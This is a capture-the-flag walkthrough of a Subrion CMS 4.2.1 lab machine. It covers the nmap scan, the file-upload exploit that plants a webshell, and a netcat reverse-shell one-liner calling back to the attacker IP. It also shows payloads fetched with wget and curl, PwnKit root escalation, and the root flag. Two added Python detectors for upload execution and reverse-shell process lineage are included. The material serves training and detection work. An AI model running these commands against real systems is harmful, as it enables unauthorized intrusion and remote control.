# Exfiltrated

## Intro

## Initial Foothold

```
# Nmap 7.94SVN scan initiated Fri Mar 29 10:17:34 2024 as: nmap -sC -sV -vv -oA nmap/initial exfiltrated.pg
Nmap scan report for exfiltrated.pg (192.168.172.163)
Host is up, received echo-reply ttl 61 (0.041s latency).
Scanned at 2024-03-29 10:17:34 CDT for 9s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0EdIHR7NOReMM0G7C8zxbLgwB3ump+nb2D3Pe3tXqp/6jNJ/GbU2e4Ab44njMKHJbm/PzrtYzojMjGDuBlQCg=
|   256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDCc0saExmeDXtqm5FS+D5RnDke8aJEvFq3DJIr0KZML
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 09BDDB30D6AE11E854BFF82ED638542B
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
| http-robots.txt: 7 disallowed entries 
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/ 
|_/updates/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 29 10:17:43 2024 -- 1 IP address (1 host up) scanned in 8.90 seconds
```

Open Ports

* 22/tcp - OpenSSH 8.2p1 Ubuntu
* 80/tcp - Apache httpd 2.4.41 Ubuntu

80/tcp is running Subrion CMS v4.2.1


Subrion v4.2.1 exploits

```
---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting                                                         | php/webapps/47469.txt
Subrion CMS 4.2.1 - 'avatar[path]' XSS                                                                          | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload                                                                       | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)                                                | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting                                                                        | php/webapps/45150.txt
Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)                                                           | php/webapps/51110.txt
---------------------------------------------------------------------------------------------------------------- ---------------------------------
```

Exploiting the Subrion arbitrary file upload (EDB 49876, CVE-2018-19422) to upload a webshell

```
┌──(joe㉿kali)-[~/hax/pg/exfiltrated]
└─$ python3 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422

[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: EKdNpVdsAO86ja8qWK4lLk86aPWmAYMUMstEDunx
[+] Trying to log in...
[+] Login Successful!

[+] Generating random name for Webshell...
[+] Generated webshell name: fjzvjyelbvdklzs

[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/fjzvjyelbvdklzs.phar

$ whoami
www-data
```
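From the defender's side, the trace this step leaves is in the Apache access log: a POST into the CMS upload directory followed by a request for a script-like file (here a `.phar`) under that same directory. The detector below is an added example written for this page, not code from the walkthrough or from the Subrion project; the log lines are constructed, and the upload endpoint path (`/panel/uploads/`) is assumed from the webshell URL shown above.

```python
import re

# Apache "combined" log format: ip ident user [ts] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Directory the CMS writes uploads into (assumed from the webshell path on this box)
UPLOAD_PREFIX = "/panel/uploads/"
# Extensions the PHP handler may execute; .phar is the one the bypass used here
EXEC_EXT_RE = re.compile(r"\.(?:php\d?|phtml|phps|phar)(?:$|[?#/])", re.IGNORECASE)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_upload_execution(lines):
    """Flag successful requests for script-like files under the upload directory.

    A hit is rated 'high' when the same client already POSTed into the upload
    directory earlier in the log (upload followed by execution), else 'medium'.
    """
    hits = []
    posted = set()  # client IPs seen POSTing into the upload directory
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"]
        if not path.startswith(UPLOAD_PREFIX):
            continue
        if rec["method"] == "POST":
            posted.add(rec["ip"])
            continue
        if EXEC_EXT_RE.search(path) and rec["status"].startswith("2"):
            hits.append({
                "ip": rec["ip"],
                "path": path.split("?", 1)[0],
                "severity": "high" if rec["ip"] in posted else "medium",
            })
    return hits


# Constructed sample log: admin login, upload, execution of the uploaded .phar,
# a benign image fetch, and a stray .php in the upload directory from another client.
SAMPLE_LOG = """\
192.168.45.197 - - [29/Mar/2024:10:20:01 -0500] "GET /panel/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.45.197 - - [29/Mar/2024:10:20:03 -0500] "POST /panel/login/ HTTP/1.1" 302 0 "-" "python-requests/2.31"
192.168.45.197 - - [29/Mar/2024:10:20:04 -0500] "POST /panel/uploads/ HTTP/1.1" 200 310 "-" "python-requests/2.31"
192.168.45.197 - - [29/Mar/2024:10:20:05 -0500] "GET /panel/uploads/fjzvjyelbvdklzs.phar HTTP/1.1" 200 9 "-" "python-requests/2.31"
10.0.0.5 - - [29/Mar/2024:10:21:00 -0500] "GET /panel/uploads/logo.png HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
10.0.0.7 - - [29/Mar/2024:10:22:00 -0500] "GET /panel/uploads/old.php HTTP/1.1" 200 14 "-" "curl/8.0"
""".splitlines()

if __name__ == "__main__":
    for hit in find_upload_execution(SAMPLE_LOG):
        print(f"[{hit['severity']}] {hit['ip']} executed {hit['path']}")
```

The same rule is a useful smoke test of the mitigation: once the web server is configured not to hand files under the upload directory to the PHP handler, a request for a `.phar` or `.php` there should return a download or a 403 rather than a 200 with script output.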

Download and run linpeas, then copy the output into the web root so it can be fetched from the Kali box

```
$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -O /tmp/linpeas.sh

$ ls /tmp/
linpeas.sh

$ sh /tmp/linpeas.sh > /tmp/linpeas-output.txt

$ cp /tmp/linpeas-output.txt /var/www/html/subrion/
```

Get Reverse Shell

```
$ which nc
/usr/bin/nc

$ wget http://192.168.45.197:8000/ncrev.sh -O /tmp/ncrev.sh

$ sh /tmp/ncrev.sh
```

Contents of reverse shell script

```
┌──(joe㉿kali)-[~/hax/pg/exfiltrated]
└─$ cat ncrev.sh                           
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.197 80 >/tmp/f
```

Listener catching shell

```
┌──(joe㉿kali)-[~/hax/pg/exfiltrated]
└─$ sudo nc -lvnp 80
[sudo] password for joe: 
listening on [any] 80 ...
connect to [192.168.45.197] from (UNKNOWN) [192.168.172.163] 47826
sh: 0: can't access tty; job control turned off
$ whoami
www-data
```
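The reverse shell above, and the `pty.spawn` upgrade used in the next section, are easy to spot from process telemetry once a few relationships are encoded: a shell running as the web server user with `apache2` as an ancestor, a network tool such as `nc` in the same lineage, and the `mkfifo ... | sh -i ... | nc` pipeline in a command line. The rules below are an added example written for this page, not code from the walkthrough; the event records are constructed in a simplified form (pid, ppid, comm, user, cmdline) rather than a real auditd or EDR schema, and the process-name lists are assumptions.

```python
import re

# Accounts the web server runs as; a shell under these is suspicious by itself
WEB_USERS = {"www-data"}
# Processes that should not normally have interactive shells beneath them
WEB_SERVER_PROCS = {"apache2", "httpd", "php-fpm"}
SHELLS = {"sh", "bash", "dash"}
NET_TOOLS = {"nc", "ncat", "netcat", "wget", "curl"}

# Command-line shapes of the fifo-backed netcat reverse shell seen on this box
PIPELINE_PATTERNS = [
    re.compile(r"mkfifo\s+\S+.*\bsh\s+-i\b.*\b(?:nc|ncat|netcat)\b"),
    re.compile(r"\bsh\s+-i\b.*\|\s*(?:nc|ncat|netcat)\b"),
]


def has_web_server_ancestor(pid, by_pid):
    """Walk the parent chain and report whether a web server process is an ancestor."""
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur["ppid"] not in seen:
        seen.add(cur["pid"])
        parent = by_pid.get(cur["ppid"])
        if parent is None:
            return False
        if parent["comm"] in WEB_SERVER_PROCS:
            return True
        cur = parent
    return False


def detect(events):
    """Return {pid: [rule names]} for every event that trips at least one rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = {}
    for e in events:
        rules = []
        if any(p.search(e["cmdline"]) for p in PIPELINE_PATTERNS):
            rules.append("reverse-shell-pipeline")
        if e["user"] in WEB_USERS and has_web_server_ancestor(e["pid"], by_pid):
            if e["comm"] in SHELLS:
                rules.append("web-server-spawned-shell")
            if e["comm"] in NET_TOOLS:
                rules.append("web-server-network-tool")
        if rules:
            hits[e["pid"]] = rules
    return hits


# Constructed process events: an Apache worker running the one-liner from the
# page via sh -c, its nc and sh -i children, and an unrelated user session.
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 1, "comm": "apache2", "user": "root",
     "cmdline": "/usr/sbin/apache2 -k start"},
    {"pid": 1001, "ppid": 1000, "comm": "apache2", "user": "www-data",
     "cmdline": "/usr/sbin/apache2 -k start"},
    {"pid": 2000, "ppid": 1001, "comm": "sh", "user": "www-data",
     "cmdline": "sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.197 80 >/tmp/f"},
    {"pid": 2001, "ppid": 2000, "comm": "nc", "user": "www-data",
     "cmdline": "nc 192.168.45.197 80"},
    {"pid": 2002, "ppid": 2000, "comm": "sh", "user": "www-data",
     "cmdline": "sh -i"},
    {"pid": 3000, "ppid": 1, "comm": "bash", "user": "joe", "cmdline": "-bash"},
    {"pid": 3001, "ppid": 3000, "comm": "nc", "user": "joe",
     "cmdline": "nc -zv 127.0.0.1 22"},
]

if __name__ == "__main__":
    for pid, rules in sorted(detect(SAMPLE_EVENTS).items()):
        print(pid, ", ".join(rules))
```

The lineage rules fire even when the payload is wrapped in a script (as with `/tmp/ncrev.sh` above) and the pipeline never appears in a single command line; the administrator's `nc -zv 127.0.0.1 22` stays quiet because neither its user nor its ancestry matches.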

## Privilege Escalation

Linpeas output suggests PwnKit (CVE-2021-4034)

Running PwnKit [exploit](https://github.com/ly4k/PwnKit) to escalate to root

```
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@exfiltrated:/var/www/html/subrion/uploads$ sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
root@exfiltrated:/var/www/html/subrion/uploads# whoami
root
root@exfiltrated:/var/www/html/subrion/uploads# cat /root/proof.txt
0d8a7229bdcfd3cf3bd4d86216f5e931
```

